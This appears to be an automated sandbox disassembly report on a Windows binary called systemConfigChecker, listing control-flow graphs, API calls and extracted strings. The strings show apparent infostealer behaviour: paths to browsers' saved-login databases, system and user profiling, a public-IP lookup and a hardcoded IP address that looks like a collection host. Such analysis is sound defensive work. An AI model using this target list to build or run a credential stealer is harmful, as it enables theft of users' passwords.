668->672 669->668 670 7ff6b2706563-7ff6b2706576 669->670 673 7ff6b27065a7-7ff6b27065aa 670->673 671->673 672->671 674 7ff6b2706589-7ff6b270659d 672->674 675 7ff6b27065ac-7ff6b27065b6 call 7ff6b27096c0 673->675 676 7ff6b27065b7-7ff6b270660f call 7ff6b2707c10 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff6b27083c0 673->676 674->673 675->676 683 7ff6b2706643-7ff6b270667a call 7ff6b2709610 call 7ff6b2704390 call 7ff6b27083c0 676->683 684 7ff6b2706611-7ff6b2706623 676->684 699 7ff6b27066b1-7ff6b27066e5 call 7ff6b2705510 call 7ff6b2701b50 683->699 700 7ff6b270667c-7ff6b270668e 683->700 686 7ff6b2706625-7ff6b2706638 684->686 687 7ff6b270663e call 7ff6b270b500 684->687 686->687 688 7ff6b270672c-7ff6b2706732 _invalid_parameter_noinfo_noreturn 686->688 687->683 692 7ff6b2706733-7ff6b270673b call 7ff6b270b500 688->692 698 7ff6b270673c-7ff6b2706744 692->698 698->555 701 7ff6b2706746-7ff6b2706757 698->701 710 7ff6b27066ea-7ff6b27066f2 699->710 702 7ff6b2706690-7ff6b27066a3 700->702 703 7ff6b27066ac call 7ff6b270b500 700->703 701->552 704 7ff6b2706759-7ff6b270676c 701->704 702->703 707 7ff6b27066a5-7ff6b27066ab _invalid_parameter_noinfo_noreturn 702->707 703->699 704->548 704->552 707->703 710->698 711 7ff6b27066f4-7ff6b2706715 call 7ff6b270a1c0 710->711 711->692 714 7ff6b2706717-7ff6b270672a 711->714 714->688 714->692
          APIs
          • GetConsoleWindow.KERNELBASE ref: 00007FF6B2705DC1
          • ShowWindow.USER32 ref: 00007FF6B2705DCF
            • Part of subcall function 00007FF6B2709610: memcpy.VCRUNTIME140(?,?,?,?,?,00007FF6B2701CCF), ref: 00007FF6B2709656
            • Part of subcall function 00007FF6B2704A40: memset.VCRUNTIME140(?), ref: 00007FF6B2704A96
            • Part of subcall function 00007FF6B2704A40: memset.VCRUNTIME140(?), ref: 00007FF6B2704AAA
            • Part of subcall function 00007FF6B2704A40: memset.VCRUNTIME140(?), ref: 00007FF6B2704ABE
            • Part of subcall function 00007FF6B2704A40: memset.VCRUNTIME140(?), ref: 00007FF6B2704AD2
            • Part of subcall function 00007FF6B2704A40: memset.VCRUNTIME140(?), ref: 00007FF6B2704AE3
            • Part of subcall function 00007FF6B2704A40: RegOpenKeyExA.KERNELBASE(?), ref: 00007FF6B2704B13
            • Part of subcall function 00007FF6B2704A40: RegGetValueA.KERNELBASE ref: 00007FF6B2704B4C
            • Part of subcall function 00007FF6B2704A40: RegCloseKey.KERNELBASE ref: 00007FF6B2704B89
            • Part of subcall function 00007FF6B2704A40: RegOpenKeyExA.KERNELBASE ref: 00007FF6B2704BB8
            • Part of subcall function 00007FF6B2704A40: RegGetValueA.KERNELBASE ref: 00007FF6B2704BF1
            • Part of subcall function 00007FF6B27083C0: memcpy.VCRUNTIME140 ref: 00007FF6B2708417
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B2705E4F
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B2705EBD
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B2705F2B
          • GlobalMemoryStatusEx.KERNELBASE ref: 00007FF6B2705F5A
          • memset.VCRUNTIME140 ref: 00007FF6B2705F6C
          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z.MSVCP140 ref: 00007FF6B2705F9A
          • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6B270607C
          • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6B2706089
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B270613E
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B27061AC
          • memcpy.VCRUNTIME140 ref: 00007FF6B27062B9
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B2706340
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B270637F
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B27063ED
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B270645B
            • Part of subcall function 00007FF6B270B508: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6B270107B), ref: 00007FF6B270B522
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B27064B3
          • memset.VCRUNTIME140 ref: 00007FF6B27064CB
            • Part of subcall function 00007FF6B2706810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6B270684A
            • Part of subcall function 00007FF6B2706810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF6B2706866
            • Part of subcall function 00007FF6B2706810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6B2706898
          • GetModuleFileNameA.KERNEL32 ref: 00007FF6B27064E9
            • Part of subcall function 00007FF6B27099F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709A69
            • Part of subcall function 00007FF6B27099F0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709A89
            • Part of subcall function 00007FF6B27099F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709A99
            • Part of subcall function 00007FF6B27099F0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709B7C
            • Part of subcall function 00007FF6B27099F0: ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709B83
            • Part of subcall function 00007FF6B27099F0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709B90
            • Part of subcall function 00007FF6B27099F0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709AE6
            • Part of subcall function 00007FF6B27099F0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709B0F
            • Part of subcall function 00007FF6B27099F0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709B36
          • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6B27065E3
          • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6B27065F0
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B27066A5
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B270672C
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B270676E
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B27067C0
            • Part of subcall function 00007FF6B2701310: ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF6B270131B
          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6B2706804
            • Part of subcall function 00007FF6B2701270: __std_exception_copy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B270B543), ref: 00007FF6B27012B4
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: _invalid_parameter_noinfo_noreturn$U?$char_traits@$D@std@@@std@@$memset$U?$char_traits@_W@std@@@std@@memcpy$??1?$basic_ios@??1?$basic_iostream@?good@ios_base@std@@?sputc@?$basic_streambuf@OpenValueWindow$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??6?$basic_ostream@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CloseConcurrency::cancel_current_taskConsoleD@std@@@1@@FileGlobalMemoryModuleNameOsfx@?$basic_ostream@_ShowStatusV01@_V12@V?$basic_streambuf@Xlength_error@std@@__std_exception_copymalloc
          • String ID: ADAPTERS INFO:$CPU INFO:$DISK INFO:$DOMAIN AND TZ INFO:$LOCALE INFO:$PROCESSES RUNNING:$RAM INFO:$USERS INFO:$ IP: $ MB$185.237.165.97$@$Executable Path: $MACHINE INFO:$Total Physical Memory:
          • API String ID: 2962708308-876331821
          • Opcode ID: 2b01728597835d1c08395949a5c84a0a3799b4b4f0304258a8e711e13eb79b4b
          • Instruction ID: c345aa9757ed54ac0375e1ce9706b7898e47268704ea6c572eb4448ebd9637d1
          • Opcode Fuzzy Hash: 2b01728597835d1c08395949a5c84a0a3799b4b4f0304258a8e711e13eb79b4b
          • Instruction Fuzzy Hash: 5552E662F14A4685EB11DB68D4503AF23A1FF467ACF405632EB6D83AD9DFADD188C304

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 715 7ff6b2705510-7ff6b270555e malloc 716 7ff6b2705570-7ff6b27055d4 GetEnvironmentVariableW call 7ff6b2708280 free call 7ff6b2709e30 call 7ff6b27050e0 715->716 717 7ff6b2705560-7ff6b270556b 715->717 727 7ff6b2705610-7ff6b270564c call 7ff6b2709e30 call 7ff6b27050e0 716->727 728 7ff6b27055d6-7ff6b27055ed 716->728 718 7ff6b2705d4b-7ff6b2705d79 call 7ff6b270b4e0 717->718 736 7ff6b2705651-7ff6b270565d 727->736 729 7ff6b27055ef-7ff6b2705602 728->729 730 7ff6b270560b call 7ff6b270b500 728->730 729->730 732 7ff6b2705604-7ff6b270560a _invalid_parameter_noinfo_noreturn 729->732 730->727 732->730 737 7ff6b270565f-7ff6b2705678 736->737 738 7ff6b270569b-7ff6b27057f3 call 7ff6b2709e30 * 8 call 7ff6b27090c0 call 7ff6b2709e30 call 7ff6b270ac60 736->738 740 7ff6b270567a-7ff6b270568d 737->740 741 7ff6b2705696 call 7ff6b270b500 737->741 765 7ff6b27057f5-7ff6b270582e memcpy 738->765 766 7ff6b2705830-7ff6b270584a call 7ff6b270a9d0 738->766 740->741 743 7ff6b270568f-7ff6b2705695 _invalid_parameter_noinfo_noreturn 740->743 741->738 743->741 767 7ff6b270584f-7ff6b27058f2 call 7ff6b27090c0 call 7ff6b2709e30 call 7ff6b270ac60 765->767 766->767 775 7ff6b27058f4-7ff6b270592d memcpy 767->775 776 7ff6b270592f-7ff6b2705949 call 7ff6b270a9d0 767->776 777 7ff6b270594e-7ff6b27059f9 call 7ff6b270b508 775->777 776->777 781 7ff6b2705a00-7ff6b2705a24 call 7ff6b27094e0 777->781 784 7ff6b2705a26-7ff6b2705a5d call 7ff6b270a1c0 call 7ff6b270b544 781->784 789 7ff6b2705a5f-7ff6b2705a76 784->789 790 7ff6b2705a99-7ff6b2705aad 784->790 791 7ff6b2705a94 call 7ff6b270b500 789->791 792 7ff6b2705a78-7ff6b2705a8b 789->792 793 7ff6b2705aaf-7ff6b2705ac5 790->793 794 7ff6b2705ae8-7ff6b2705afa 790->794 791->790 792->791 795 7ff6b2705a8d-7ff6b2705a93 _invalid_parameter_noinfo_noreturn 792->795 797 7ff6b2705ae3 call 7ff6b270b500 793->797 798 7ff6b2705ac7-7ff6b2705ada 793->798 799 7ff6b2705afc-7ff6b2705b12 794->799 800 7ff6b2705b36-7ff6b2705b3f 794->800 795->791 797->794 798->797 803 7ff6b2705adc-7ff6b2705ae2 _invalid_parameter_noinfo_noreturn 798->803 805 7ff6b2705b14-7ff6b2705b27 799->805 806 7ff6b2705b30-7ff6b2705b35 call 7ff6b270b500 799->806 801 7ff6b2705b41-7ff6b2705b58 800->801 802 7ff6b2705b7b-7ff6b2705b8f 800->802 807 7ff6b2705b5a-7ff6b2705b6d 801->807 808 7ff6b2705b76 call 7ff6b270b500 801->808 809 7ff6b2705b91-7ff6b2705ba7 802->809 810 7ff6b2705bca-7ff6b2705bdc 802->810 803->797 805->806 811 7ff6b2705b29-7ff6b2705b2f _invalid_parameter_noinfo_noreturn 805->811 806->800 807->808 814 7ff6b2705b6f-7ff6b2705b75 _invalid_parameter_noinfo_noreturn 807->814 808->802 816 7ff6b2705bc5 call 7ff6b270b500 809->816 817 7ff6b2705ba9-7ff6b2705bbc 809->817 818 7ff6b2705bde-7ff6b2705bf4 810->818 819 7ff6b2705c17-7ff6b2705c57 810->819 811->806 814->808 816->810 817->816 822 7ff6b2705bbe-7ff6b2705bc4 _invalid_parameter_noinfo_noreturn 817->822 824 7ff6b2705c12 call 7ff6b270b500 818->824 825 7ff6b2705bf6-7ff6b2705c09 818->825 820 7ff6b2705c90-7ff6b2705cb2 819->820 821 7ff6b2705c59-7ff6b2705c6d 819->821 830 7ff6b2705cb4-7ff6b2705cc8 820->830 831 7ff6b2705cf3-7ff6b2705d0d 820->831 828 7ff6b2705c6f-7ff6b2705c82 821->828 829 7ff6b2705c8b call 7ff6b270b500 821->829 822->816 824->819 825->824 826 7ff6b2705c0b-7ff6b2705c11 _invalid_parameter_noinfo_noreturn 825->826 826->824 828->829 833 7ff6b2705c84-7ff6b2705c8a _invalid_parameter_noinfo_noreturn 828->833 829->820 835 7ff6b2705cca-7ff6b2705cdd 830->835 836 7ff6b2705ce6-7ff6b2705ceb call 7ff6b270b500 830->836 831->718 832 7ff6b2705d0f-7ff6b2705d28 831->832 837 7ff6b2705d2a-7ff6b2705d3d 832->837 838 7ff6b2705d46 call 7ff6b270b500 832->838 833->829 835->836 839 7ff6b2705cdf-7ff6b2705ce5 _invalid_parameter_noinfo_noreturn 835->839 836->831 837->838 841 7ff6b2705d3f-7ff6b2705d45 _invalid_parameter_noinfo_noreturn 837->841 838->718 839->836 841->838
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: _invalid_parameter_noinfo_noreturn$EnvironmentVariablefreemalloc
          • String ID: ?????? ??????: $USERPROFILE$\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data$\AppData\Local\Chromium\User Data\Default\Login Data$\AppData\Local\Google\Chrome Beta\User Data\Default\Login Data$\AppData\Local\Google\Chrome\User Data\Default\Login Data$\AppData\Local\Microsoft\Edge\User Data\Default\Login Data$\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data$\AppData\Roaming\Mozilla\Firefox\Profiles$\AppData\Roaming\Mozilla\Firefox\Profiles\$\AppData\Roaming\Opera Software\Opera GX Stable\Login Data$\AppData\Roaming\Opera Software\Opera Stable\Login Data$\logins.json$\times.json$defa$rele$rele
          • API String ID: 716798019-1786275549
          • Opcode ID: 945badb9ec5cdd080a3f4387013dcbc219eeff5c8b0478921573e240f6d3476d
          • Instruction ID: 8d155dd781267955ac49a664ec7ba553d32a967fadf3ecc8637e45a10299271a
          • Opcode Fuzzy Hash: 945badb9ec5cdd080a3f4387013dcbc219eeff5c8b0478921573e240f6d3476d
          • Instruction Fuzzy Hash: CF32D672A24BC695EB21CF68D8443EE23A1FB46798F405232D75C57B99DFB9D288C304

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 844 7ff6b2704a40-7ff6b2704b1b call 7ff6b270c530 memset * 5 call 7ff6b2706810 RegOpenKeyExA 849 7ff6b2704b1d-7ff6b2704b54 RegGetValueA 844->849 850 7ff6b2704b97-7ff6b2704bc0 RegOpenKeyExA 844->850 853 7ff6b2704b84-7ff6b2704b8f RegCloseKey 849->853 854 7ff6b2704b56-7ff6b2704b7f call 7ff6b27099f0 * 3 849->854 851 7ff6b2704bc2-7ff6b2704bf9 RegGetValueA 850->851 852 7ff6b2704c3c-7ff6b2704c65 RegOpenKeyExA 850->852 855 7ff6b2704bfb-7ff6b2704c24 call 7ff6b27099f0 * 3 851->855 856 7ff6b2704c29-7ff6b2704c34 RegCloseKey 851->856 857 7ff6b2704d4c-7ff6b2704d78 852->857 858 7ff6b2704c6b-7ff6b2704ca2 RegGetValueA 852->858 853->850 854->853 855->856 856->852 864 7ff6b2704d9b-7ff6b2704d9e 857->864 865 7ff6b2704d7a-7ff6b2704d84 857->865 860 7ff6b2704ca4-7ff6b2704ccd call 7ff6b27099f0 * 3 858->860 861 7ff6b2704cd2-7ff6b2704d09 RegGetValueA 858->861 860->861 871 7ff6b2704d0b-7ff6b2704d34 call 7ff6b27099f0 * 3 861->871 872 7ff6b2704d39-7ff6b2704d44 RegCloseKey 861->872 869 7ff6b2704dc2-7ff6b2704dc7 864->869 870 7ff6b2704da0-7ff6b2704daa 864->870 865->864 866 7ff6b2704d86-7ff6b2704d99 865->866 874 7ff6b2704dcc-7ff6b2704dcf 866->874 869->874 870->869 877 7ff6b2704dac-7ff6b2704dc0 870->877 871->872 872->857 882 7ff6b2704dd1-7ff6b2704dd9 call 7ff6b27096c0 874->882 883 7ff6b2704dda-7ff6b2704e45 call 7ff6b2707c10 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff6b270b4e0 874->883 877->874 882->883
          APIs
          • memset.VCRUNTIME140(?), ref: 00007FF6B2704A96
          • memset.VCRUNTIME140(?), ref: 00007FF6B2704AAA
          • memset.VCRUNTIME140(?), ref: 00007FF6B2704ABE
          • memset.VCRUNTIME140(?), ref: 00007FF6B2704AD2
          • memset.VCRUNTIME140(?), ref: 00007FF6B2704AE3
            • Part of subcall function 00007FF6B2706810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6B270684A
            • Part of subcall function 00007FF6B2706810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF6B2706866
            • Part of subcall function 00007FF6B2706810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6B2706898
          • RegOpenKeyExA.KERNELBASE(?), ref: 00007FF6B2704B13
          • RegGetValueA.KERNELBASE ref: 00007FF6B2704B4C
          • RegCloseKey.KERNELBASE ref: 00007FF6B2704B89
          • RegOpenKeyExA.KERNELBASE ref: 00007FF6B2704BB8
          • RegGetValueA.KERNELBASE ref: 00007FF6B2704BF1
          • RegCloseKey.ADVAPI32 ref: 00007FF6B2704C2E
          • RegOpenKeyExA.KERNELBASE ref: 00007FF6B2704C5D
          • RegGetValueA.KERNELBASE ref: 00007FF6B2704C9A
          • RegGetValueA.KERNELBASE ref: 00007FF6B2704D01
          • RegCloseKey.KERNELBASE ref: 00007FF6B2704D3E
          • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6B2704E0F
          • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6B2704E19
            • Part of subcall function 00007FF6B27099F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709A69
            • Part of subcall function 00007FF6B27099F0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709A89
            • Part of subcall function 00007FF6B27099F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709A99
            • Part of subcall function 00007FF6B27099F0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709B7C
            • Part of subcall function 00007FF6B27099F0: ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709B83
            • Part of subcall function 00007FF6B27099F0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709B90
            • Part of subcall function 00007FF6B27099F0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709AE6
            • Part of subcall function 00007FF6B27099F0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709B0F
            • Part of subcall function 00007FF6B27099F0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709B36
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: U?$char_traits@$D@std@@@std@@$memset$Value$CloseOpenU?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@D@std@@@1@@Osfx@?$basic_ostream@_V12@V?$basic_streambuf@
          • String ID: BaseBoardProduct$DisplayVersion$HARDWARE\DESCRIPTION\System\BIOS$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Machine name: $OS display version: $OS name: $Processor name: $ProcessorNameString$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
          • API String ID: 20268565-1502927450
          • Opcode ID: 621b55e935ff6405d9fe05d3b75cbcd6982443e8c92c0c421b99860315d121c5
          • Instruction ID: e0b9a833eaafaf2b3bb25af7f8b734204988af051f11af9ad5a4a1165ad292db
          • Opcode Fuzzy Hash: 621b55e935ff6405d9fe05d3b75cbcd6982443e8c92c0c421b99860315d121c5
          • Instruction Fuzzy Hash: C8B19032A18B4186EB21CB29E8502EA73E4FB8578CF404236DB8D87769EF7DD149C744

          Control-flow Graph

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: Http$CloseHandle$DataOpenRequestmemcpy$AvailableConnectQueryReadReceiveResponseSend_invalid_parameter_noinfo_noreturnmemset
          • String ID: GET$Unable to get IP$WinHTTP/1.0$api.ipify.org
          • API String ID: 849217320-4095685055
          • Opcode ID: 23648efb205baca81fbdab06176de54150f29ea8efcdd1e0d08f0531ae66fc50
          • Instruction ID: e7c0bf99d47da8e7ccad27e193c049f878617e033c4614286c4ab063fc4cab23
          • Opcode Fuzzy Hash: 23648efb205baca81fbdab06176de54150f29ea8efcdd1e0d08f0531ae66fc50
          • Instruction Fuzzy Hash: 65619632A1874182EA15CB29E44076F77E1FB8AB88F144535EB8C43B54DFBED489CB44

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 979 7ff6b2704640-7ff6b27046a0 GetLocaleInfoA 980 7ff6b27046a2-7ff6b27046c2 call 7ff6b270a0c0 979->980 981 7ff6b27046c7-7ff6b27046e2 979->981 986 7ff6b2704785-7ff6b27047af call 7ff6b270b4e0 980->986 983 7ff6b27046e5-7ff6b27046ec 981->983 983->983 985 7ff6b27046ee-7ff6b2704722 call 7ff6b270a0c0 GetLocaleInfoA 983->985 991 7ff6b27047b0-7ff6b27047bf 985->991 992 7ff6b2704728-7ff6b2704751 call 7ff6b270a0c0 985->992 993 7ff6b27047c6-7ff6b27047cd 991->993 992->986 998 7ff6b2704753-7ff6b2704765 992->998 993->993 995 7ff6b27047cf-7ff6b2704902 call 7ff6b270a0c0 memset ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ call 7ff6b27099f0 call 7ff6b270b250 call 7ff6b27099f0 call 7ff6b270b250 call 7ff6b27099f0 993->995 1014 7ff6b2704925-7ff6b2704928 995->1014 1015 7ff6b2704904-7ff6b270490e 995->1015 1000 7ff6b2704780 call 7ff6b270b500 998->1000 1001 7ff6b2704767-7ff6b270477a 998->1001 1000->986 1001->1000 1003 7ff6b2704a33-7ff6b2704a39 _invalid_parameter_noinfo_noreturn 1001->1003 1017 7ff6b270494c-7ff6b2704951 1014->1017 1018 7ff6b270492a-7ff6b2704934 1014->1018 1015->1014 1016 7ff6b2704910-7ff6b2704923 1015->1016 1019 7ff6b2704956-7ff6b2704959 1016->1019 1017->1019 1018->1017 1020 7ff6b2704936-7ff6b270494a 1018->1020 1021 7ff6b2704964-7ff6b27049aa call 7ff6b2707c10 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ 1019->1021 1022 7ff6b270495b-7ff6b2704963 call 7ff6b27096c0 1019->1022 1020->1019 1027 7ff6b27049e1-7ff6b27049fc 1021->1027 1028 7ff6b27049ac-7ff6b27049be 1021->1028 1022->1021 1027->986 1029 7ff6b2704a02-7ff6b2704a14 1027->1029 1030 7ff6b27049c0-7ff6b27049d3 1028->1030 1031 7ff6b27049dc call 7ff6b270b500 1028->1031 1029->1000 1033 7ff6b2704a1a-7ff6b2704a2d 1029->1033 1030->1031 1034 7ff6b27049d5-7ff6b27049db _invalid_parameter_noinfo_noreturn 1030->1034 1031->1027 1033->1000 1033->1003 1034->1031
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
